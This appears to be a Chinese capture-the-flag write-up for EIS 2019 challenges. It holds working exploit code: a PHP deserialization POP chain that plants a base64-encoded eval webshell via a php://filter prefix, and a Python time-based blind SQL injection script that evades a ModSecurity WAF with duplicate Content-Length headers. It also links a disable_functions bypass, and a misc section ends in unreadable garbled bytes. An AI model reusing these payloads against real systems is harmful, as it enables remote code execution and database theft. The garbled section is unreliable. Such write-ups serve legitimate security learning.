比赛

eis2019

eis2019

web

ezupload

upload:

校验文件头

过滤后缀php

上传php5后缀绕过

ezpop

https://www.leavesongs.com/PENETRATION/php-filter-magic.html 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
<?php
error_reporting(0);

class A{

    protected $store;

    protected $key;

    protected $expire;

    public function __construct($store, $key = 'flysystem', $expire = null)
    {
        $this->key    = $key;
        $this->store  = $store;
        $this->expire = $expire;
    }

    public function cleanContents(array $contents)
    {
        $cachedProperties = array_flip([
            'path', 'dirname', 'basename', 'extension', 'filename',
            'size', 'mimetype', 'visibility', 'timestamp', 'type',
        ]);

        foreach ($contents as $path => $object) {
            if (is_array($object)) {
                $contents[$path] = array_intersect_key($object, $cachedProperties);
            }
        }

        return $contents;
    }

    public function getForStorage()
    {
        $cleaned = $this->cleanContents($this->cache);

        return json_encode([$cleaned, $this->complete]);
    }

    public function save()
    {
        $contents = $this->getForStorage();

        $this->store->set($this->key, $contents, $this->expire);
    }

    public function __destruct()
    {
        if (! $this->autosave) {
            $this->save();
        }
    }
}

class B{

    protected function getExpireTime($expire): int
    {
        return (int) $expire;
    }

    public function getCacheKey(string $name): string
    {
        return $this->options['prefix'] . $name;
    }

    protected function serialize($data): string
    {
        if (is_numeric($data)) {
            return (string) $data;
        }

        $serialize = $this->options['serialize'];

        return $serialize($data);
    }

    public function set($name, $value, $expire = null): bool
    {
        $this->writeTimes++;

        if (is_null($expire)) {
            $expire = $this->options['expire'];
        }

        $expire   = $this->getExpireTime($expire);
        $filename = $this->getCacheKey($name);

        $dir = dirname($filename);

        if (!is_dir($dir)) {
            try {
                mkdir($dir, 0755, true);
            } catch (\Exception $e) {
                // 创建失败
            }
        }

        $data = $this->serialize($value);

        if ($this->options['data_compress'] && function_exists('gzcompress')) {
            //数据压缩
            $data = gzcompress($data, 3);
        }

        $data   = "<?php\n//" . sprintf('%012d', $expire) . "\n exit();?>\n" . $data;
        $result = file_put_contents($filename, $data);

        if ($result) {
            return true;
        }

        return false;
    }

}

if (isset($_GET['src']))
{
    highlight_file(__FILE__);
}

$dir = "uploads/";

if (!is_dir($dir))
{
    mkdir($dir);
}
unserialize($_GET["data"]);

这里有一个上传点

1
2
$data   = "<?php\n//" . sprintf('%012d', $expire) . "\n exit();?>\n" . $data;
$result = file_put_contents($filename, $data);

但是这里有个死亡exit

https://www.leavesongs.com/PENETRATION/php-filter-magic.html

这里文件名可控,我们用php协议编码exit从而绕过死亡exit

构造

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
<?php

class A{

    protected $store;

    protected $key;

    protected $expire;
    public $autosave=FALSE;
    public $complete;
    public $cache;

    public function __construct()
    {
        $this->key    = "fffffuck.php";
        $this->store=new B;
        $this->expire = $expire;
        $this->complete="PD9waHAgZXZhbCgkX1BPU1RbImEiXSk7ID8+";
        $this->cache=array();
    }

}

class B{

    public $options;
    public $writeTimes;
    public function __construct()
    {
        $this->options=array(
            'expire'=>'0',
            "prefix"=>'php://filter/write=convert.base64-decode/resource=uploads/',
            'serialize'=>'serialize',
            'data_compress'=>FALSE
        );

    }


}
print(urlencode(serialize(new A)));
?>

ezbypass

https://github.com/mm0r1/exploits

利用这个绕过

ezwaf

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
<?php
include "config.php";

if (isset($_GET['src']))
{
    highlight_file(__FILE__);
}

function escape($arr)
{
    global $mysqli;
    $newarr = array();
    foreach($arr as $key=>$val)
    {
        if (!is_array($val))
        {
            $newarr[$key] = mysqli_real_escape_string($mysqli, $val);
        }
    }
    return $newarr;
}

$_GET= escape($_GET);

if (isset($_GET['name']))
{
    $name = $_GET['name'];
    mysqli_query($mysqli, "select age from user where name='$name'");
}else if(isset($_GET['age']))
{
    $age = $_GET['age'];
    mysqli_query($mysqli, "select name from user where age=$age");
}


选择age作为注入点,不需要逃逸引号,没有回显利用时间盲注

?age=1%2bsleep(1) => 403

apache设置了waf

用畸形的http绕过waf

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
import requests
import hackhttp 
import urllib
import socket

ip = '111.186.57.61'
port = 10601

def send_raw(raw):

    try:
        with socket.create_connection((ip, port), timeout=2) as conn:
            conn.send(bytes(raw,encoding="ascii"))
            res = conn.recv(10240).decode()

    except:
        return True
    
    return False



def rawhttp(sql):
    sql=urllib.parse.quote(sql)
    burp0_url = "http://111.186.57.61:10601/?age={}".format(sql)
    raw='''GET /?age={} HTTP/1.1
Host: 111.186.57.61:10601
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
Content-Length: 0
Content-Length: 0

'''.format(sql).replace("\n","\r\n")
    return send_raw(raw)


l='0123456789ABCDEF'
result="657A73716C69"#database :ezsqli

result=""#table flag_xdd,user?
#column flag_32122
#flag{bypass_modsecurity_a202e614489c}
j=len(result)
while True:
    for i in l:
        sql="if((select substr(hex(GROUP_CONCAT(flag_32122)),{},1) FROM flag_xdd)=char({}),sleep(10),0)".format(j+1,ord(i))
        if rawhttp(sql):
            result+=i
            print(result)
            break
        else :
            print("第{}个字符不是{}".format(j+1,i))
    j+=1


ezcms

莫得

misc

two_cat

看别人的wp知道是盲水印攻击

misc 1

1
I¤Ìçz6j|´±¥óŒ¼“¹[ƂĄʃz@ałޢ|ӄɒak@ałޢŅyĉӡk@ałޒ|ӄɒak@֋@JB™ťɁÉ֕k@ŧÅՄń@‰Ձ٨@ÖąŀąÉԁԀɕÅكȁՇƀÖąZ@U@SӅDžŀÈYCÅڀ…ĀĢń@֕@ʂՀĉՖęË@ɣ@ŧɢâ@ɕ@c@ӅbĀ‰ȀԤäSӨ@ɕÖԗcɂӅ@Ņ٢ɖբk@SԀƅcęɕȀ¤È@ąӉLjâ@b@Ֆ֠ÖգɇĖĢ@Ӆãř@…ؤŕÅÀUŀÈƀB…Ճƀֆ@…ŅفԀ¢ĉʀפՃäcɖրÈYCÅ٢@ƁəӨ@ɔז٣UĀƖڀԖąٕ@Öԗģř@ӁՇāDžÀMŧCÓɀƈɃɀÈYCÅ٢@YƀB…գ@ŁىŢ@CÖلɕȀÖ@ƈɃɀŅ٢ɖրֆ@ƂĄʃ@ȖŽم@Ӗ֒ɕȀc]K@ʂՀDWÅŀƂĄʃ@ƙ֔@פՃȅŀÁل@Öą@ɕ@ÈƀŁٓɀ񹶰ÀUŀי֔ēǁÅŀɣ@b@€ä£֔ř`ÖգٖԀÁãɃ@M…ƀÖՕŃÖڀÖբ׉فè]k@—ęՉՇ@ÈƀSمDɀŢÁ“ɢȅŀ¢ĉʀ£UāلK@㖄hk@ʂՀÓIԢ@Ö@…@U@֗ŕ`¨£ŔÀÖԗUɫ@¤ĀʂսÀ֦րąƒىףɖրֆ@ÈƀƂĄʃ@ŁىUâ@UŀȖǀÖ@ÖեřĀ…æŅրÈŔ@ɢ@£ɓԀɕÅٕSӨ@Ób‰Ɖń@Öؠ…Ùţk@¤ٕ`…Ɩم`مDɕȋ@ȁÒřÀ“UÈ@c@ÈƀŅ٨@Ձԅ@ֆ@ƂĄʃ@UŀÖբɄř@ɣ@€ԁՉƅ£cɖրֆ@פم£@ťɓKƓG@ɢ@ƓGp°��ƴ����򴄴𰲳ǰƄÅ�